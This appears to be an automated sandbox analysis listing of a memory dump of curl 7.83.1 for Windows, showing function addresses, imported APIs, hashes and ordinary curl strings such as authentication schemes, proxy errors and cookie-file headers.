Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _errno$strtoul$__stdio_common_vsscanf
String ID: %c-%c%c$bad range$bad range specification$range overflow
API String ID: 3842623485-566611384
Opcode ID: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
Instruction ID: ae37b0074acb49fa66055a031d27643aeea19637cb770582d59aa3901ad149ac
Opcode Fuzzy Hash: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
Instruction Fuzzy Hash: 4FC1AF72A0A7948AFB14EF25D9587EC3BB1F345B88F91803DDA5A43790DB39CA56C700

Function 000000013F30F650 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 219stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,000000013F30A5FA), ref: 000000013F30F67F
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00000000,000000013F30A5FA), ref: 000000013F30F694
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,000000013F30A5FA), ref: 000000013F30F6B4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,000000013F30A5FA), ref: 000000013F30F705
puts.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,000000013F30A5FA), ref: 000000013F30F78F
puts.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,000000013F30A5FA), ref: 000000013F30F7CA

Part of subcall function 000000013F310444: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,000000013F30F917), ref: 000000013F310546

Strings

--disable, xrefs: 000000013F30F6BE
<none>, xrefs: 000000013F30F7C3
hnd = NULL;, xrefs: 000000013F30F968, 000000013F30F99D
curl_easy_cleanup(hnd);, xrefs: 000000013F30F955, 000000013F30F98A
hnd = curl_easy_init();, xrefs: 000000013F30F825
Build-time engines:, xrefs: 000000013F30F788
%s, xrefs: 000000013F30F7A2
out of memory, xrefs: 000000013F30F83A

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _strdupputs$freesetlocalestrncmp
String ID: %s$ <none>$--disable$Build-time engines:$curl_easy_cleanup(hnd);$hnd = NULL;$hnd = curl_easy_init();$out of memory
API String ID: 1782117485-3702358654
Opcode ID: ebcf773e13911affead49d169eaf03a6635d7cb59ee7551b26c8d61b44cbba44
Instruction ID: f274fb5934ec0159f01d9abf43b0d395b4d271cf771077c66bd10422b5bafe39
Opcode Fuzzy Hash: ebcf773e13911affead49d169eaf03a6635d7cb59ee7551b26c8d61b44cbba44
Instruction Fuzzy Hash: 5F916A35A0564291FA54EB21E8903ED63A1FB84F90F94843AD94A87795DF38CB4BC341

Function 000000013F337914 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 121COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F337A5D

Strings

Digest, xrefs: 000000013F33799D
Authorization, xrefs: 000000013F337A20, 000000013F337A8B
NTLM, xrefs: 000000013F337985
Proxy, xrefs: 000000013F337AD9
Bearer, xrefs: 000000013F337A3B
Server, xrefs: 000000013F337AC4
Proxy-authorization, xrefs: 000000013F3379CB
Negotiate, xrefs: 000000013F33796F
%s auth using %s with user '%s', xrefs: 000000013F337ACE
Authorization: Bearer %s, xrefs: 000000013F337A56
Basic, xrefs: 000000013F3379DF
AWS_SIGV4, xrefs: 000000013F33794E

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %s auth using %s with user '%s'$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
API String ID: 1992661772-237531397
Opcode ID: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
Instruction ID: 7ec4f2581e8a7964fb52a665abddb3b9ad3dd7854205e07b3663f0a598988fc8
Opcode Fuzzy Hash: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
Instruction Fuzzy Hash: 09518B32A09782D4FB24DB25D9403D92BA0F705B98F44423FDA4987796DB39C75BCB11

Function 000000013F309E74 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F3150D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,000000013F309CBC), ref: 000000013F3150F9

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F309F03
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 000000013F309F6A
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F309F9A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F309FB2

Strings

2022-05-13, xrefs: 000000013F309EA7
Features:, xrefs: 000000013F309F1C
Protocols: , xrefs: 000000013F309EC8
%s, xrefs: 000000013F309F7E
curl 7.83.1 (Windows) %s, xrefs: 000000013F309E9B
Release-Date: %s, xrefs: 000000013F309EAE
WARNING: curl and libcurl versions do not match. Functionality may be affected., xrefs: 000000013F309FBB
7.83.1, xrefs: 000000013F309FAB
%s , xrefs: 000000013F309EE4

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: puts$__acrt_iob_funcqsortstrcmp
String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
API String ID: 2220958200-3826092985
Opcode ID: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
Instruction ID: d3eb6e6e04e57c8fa0b6d518092eeea6d6a84c90ff90051b91cdd04b1dc67033
Opcode Fuzzy Hash: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
Instruction Fuzzy Hash: A7415B71A01949D2EF51EB25E8843D9A361FB84B84F94443ED94E473A9DF38CB8BC740

Function 000000013F302350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F3020D0: _scwprintf.LIBCMT ref: 000000013F302130

_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F302417
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F302424
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 000000013F302440
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 000000013F30246C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30247B
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 000000013F3024A7
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 000000013F3024C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3024D6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3024E4
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F3024FE
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F30253D

Strings

Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 000000013F3023EE

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ByteCharConsoleMultiWidefree$BufferInfoScreenWrite_fileno_get_osfhandle_scwprintffflushfwritemalloc
String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
API String ID: 662453125-3734715646
Opcode ID: 825750e178d52abaa70d249529622de493b9645fa82493731f53fbd41dc260e0
Instruction ID: d412464a4b2131f1623650a081b983b1f5bda193db21f664497fd5fab5f5e7be
Opcode Fuzzy Hash: 825750e178d52abaa70d249529622de493b9645fa82493731f53fbd41dc260e0
Instruction Fuzzy Hash: F3517072A1978182EF549F22E8547A967A0F785BC8F04443AEE4E47795DF3CC687C304

Function 000000013F3313C8 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 301COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F3317AD

Strings

Read callback asked for PAUSE when not supported, xrefs: 000000013F3316F4
Malformatted trailing header, skipping trailer, xrefs: 000000013F33152A
operation aborted by callback, xrefs: 000000013F3316C1
operation aborted by trailing headers callback, xrefs: 000000013F3315E5
read function returned funny value, xrefs: 000000013F331739
Signaling end of chunked upload after trailers., xrefs: 000000013F3318B5
Successfully compiled trailers., xrefs: 000000013F331566
Moving trailers state machine from initialized to sending., xrefs: 000000013F331413
Signaling end of chunked upload via terminating chunk., xrefs: 000000013F331809
%zx%s, xrefs: 000000013F331786

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %zx%s$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
API String ID: 1488884202-2453975552
Opcode ID: 5fb2684a9bea3a436fc15b99a4ea7facf2869658ddb6248bc3fce7fd0c88f7ba
Instruction ID: 9f0bee48afc9de3c2df0a87a0b1c2944b8f17d0e5bee29051966f92e1cb2c94c
Opcode Fuzzy Hash: 5fb2684a9bea3a436fc15b99a4ea7facf2869658ddb6248bc3fce7fd0c88f7ba
Instruction Fuzzy Hash: 81E19B32F05B80A6FB59EB21D5403E967A0F745B94F48813ADE6A0B395DF38D6A6C301

Function 000000013F329260 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 300COMMON

Download Yara Rule

Strings

socks4, xrefs: 000000013F329374
http, xrefs: 000000013F32939A
socks5, xrefs: 000000013F329340
socks5h, xrefs: 000000013F329323
Unsupported proxy scheme for '%s', xrefs: 000000013F3293AD
socks, xrefs: 000000013F329387
socks4a, xrefs: 000000013F32935A
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support., xrefs: 000000013F3293E0
Unsupported proxy syntax in '%s', xrefs: 000000013F329671
https, xrefs: 000000013F329306

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID:
String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
API String ID: 0-874090715
Opcode ID: eb0975095b33097f1b693aa07614678dad25c1bf6672c8bb6ef7bfb6f2bc264c
Instruction ID: 1e809c9d71a96d9f0842b3dc5bc2d954f628f63f8eb5e82b4b6ff47476b473e0
Opcode Fuzzy Hash: eb0975095b33097f1b693aa07614678dad25c1bf6672c8bb6ef7bfb6f2bc264c
Instruction Fuzzy Hash: 28D1793AF02B44A5FB10DB22E8847ED27A1B748BA4F050539CE2E5B7D5DB38D64AD340

Function 000000013F323BA4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 223networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F32315C: htons.WS2_32 ref: 000000013F3231A6

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F323C24
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F323C2C

Part of subcall function 000000013F31E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31E9E3
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31E9EB
Part of subcall function 000000013F31E9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31E9FB
Part of subcall function 000000013F31E9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EA05
Part of subcall function 000000013F31E9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31EA18
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EAA8
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EAB3
Part of subcall function 000000013F31E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EABC
Part of subcall function 000000013F31E9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EAC8

Part of subcall function 000000013F324190: closesocket.WS2_32 ref: 000000013F3241D8

setsockopt.WS2_32 ref: 000000013F323CB3
WSAGetLastError.WS2_32 ref: 000000013F323CBD

Strings

sa_addr inet_ntop() failed with errno %d: %s, xrefs: 000000013F323C43
Could not set TCP_NODELAY: %s, xrefs: 000000013F323CD4
Immediate connect fail for %s: %s, xrefs: 000000013F323EB2
Trying %s:%d..., xrefs: 000000013F323C63

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrclosesockethtonssetsockoptstrncpy
String ID: Trying %s:%d...$Could not set TCP_NODELAY: %s$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3201143625-1915463321
Opcode ID: 8760f28a52d8ca9847d57e6e5c7e9b09f571983ff254badd81ce2595904c8d4d
Instruction ID: 82609dee3f2257d19688817482fc389ff5831246f9e5068fb109a51116b2523a
Opcode Fuzzy Hash: 8760f28a52d8ca9847d57e6e5c7e9b09f571983ff254badd81ce2595904c8d4d
Instruction Fuzzy Hash: FC91117AB01695A5FB60DB66E4087DA23A0F745BD8F80443EEE0A07785DF38CB4AC751

Function 000000013F311E80 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 171COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F311F37
__swprintf_l.LIBCMT ref: 000000013F311FDD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000000013F30F1CE,?,?,?,?,?,00000000,00000000,000000013F30F585,?,00000001,?,00000000,00000000), ref: 000000013F3120BD

Strings

%s set to a %s, xrefs: 000000013F312045
curl_easy_setopt(hnd, %s, %s);, xrefs: 000000013F31209F
%ldL, xrefs: 000000013F311F26
(curl_off_t)%I64d, xrefs: 000000013F311FCC
functionpointer, xrefs: 000000013F311F72
blobpointer, xrefs: 000000013F312007
objectpointer, xrefs: 000000013F311FA3
curl_easy_setopt(hnd, %s, "%s");, xrefs: 000000013F31208F

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_l$free
String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
API String ID: 1144208884-2831394677
Opcode ID: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
Instruction ID: 10890ce8aee208a66016d627156e67d3eca6ad2c6ca8efe3be8f55950ee50f17
Opcode Fuzzy Hash: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
Instruction Fuzzy Hash: B5612536E18A4591FA20AB11E5407ED6375B789BE8F545239DE4907BD5EB3CCB8BC300

Function 000000013F325F5C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 000000013F324908: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F31DE4D,?,00000000,00000000,?), ref: 000000013F324925

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326956,?,?,00000000,000000013F30B1A6), ref: 000000013F325FB4
_scwprintf.LIBCMT ref: 000000013F325FF2
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326956,?,?,00000000,000000013F30B1A6), ref: 000000013F32602D
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326956,?,?,00000000,000000013F30B1A6), ref: 000000013F3260A5
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326956,?,?,00000000,000000013F30B1A6), ref: 000000013F326108
_unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326956,?,?,00000000,000000013F30B1A6), ref: 000000013F326120
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326956,?,?,00000000,000000013F30B1A6), ref: 000000013F326162

Strings

%s.%s.tmp, xrefs: 000000013F325FEB
%s, xrefs: 000000013F3260C6
# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000000013F326026

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fclose$__acrt_iob_func_scwprintf_time64_unlinkfputsqsort
String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
API String ID: 1743472579-1951421411
Opcode ID: 3d8685de0f6e550342ad27a64f5a87a40584b735791b02571328bc08ee04d199
Instruction ID: 3c7e2d2e744704749331c4b0793f575fbececb2a54aeb9d7fdd7e359d837a333
Opcode Fuzzy Hash: 3d8685de0f6e550342ad27a64f5a87a40584b735791b02571328bc08ee04d199
Instruction Fuzzy Hash: A2515C39B4564495FE55AB22E8543E923A1BB89BC8F444439DD0E4B3A1EF3CE747C340

Function 000000013F303AC8 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 75filetimeCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F303AE3
CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F303B0D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F303B1E
GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F303B3A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F303BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F303BC4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F303BCF

Strings

Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 000000013F303BA7
Failed to get filetime: underflow, xrefs: 000000013F303B62
Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 000000013F303BD5

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleTime_strdupfree
String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
API String ID: 1016757606-2112902429
Opcode ID: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
Instruction ID: b79026e0b75ae822ba5951ac6508a79321a4cd2c7a2d38a794896f2e3482b1dd
Opcode Fuzzy Hash: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
Instruction Fuzzy Hash: 5531C031B0574582EE14AF26A4143D9A3A1F784BD4F08463ADD9E47B99DF2CC68BC701

Function 000000013F30990C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F30995D
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F3099AF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3099E3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F309A19
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F309AC1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F309BD9

Strings

option %s: %s, xrefs: 000000013F309BAA
%s, xrefs: 000000013F309BC2
--url, xrefs: 000000013F309B46
2, xrefs: 000000013F309A46

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$_strdup$malloc
String ID: %s$--url$2$option %s: %s
API String ID: 854390910-1570926479
Opcode ID: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
Instruction ID: 50f2700c76b6fcd7722a434057c6637539a2d9e555c32857d48b44f688e17098
Opcode Fuzzy Hash: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
Instruction Fuzzy Hash: B581B032A0B7C68AEB65DB29A4543E93791F7857A4F18403EDE8F47785EA38C647C301

Function 000000013F303EDC Relevance: 16.6, APIs: 11, Instructions: 137COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303F28
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303F31
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303F41
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303F4A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303F5F
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303F68
_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 000000013F303F80
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303FB3
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F303FE6
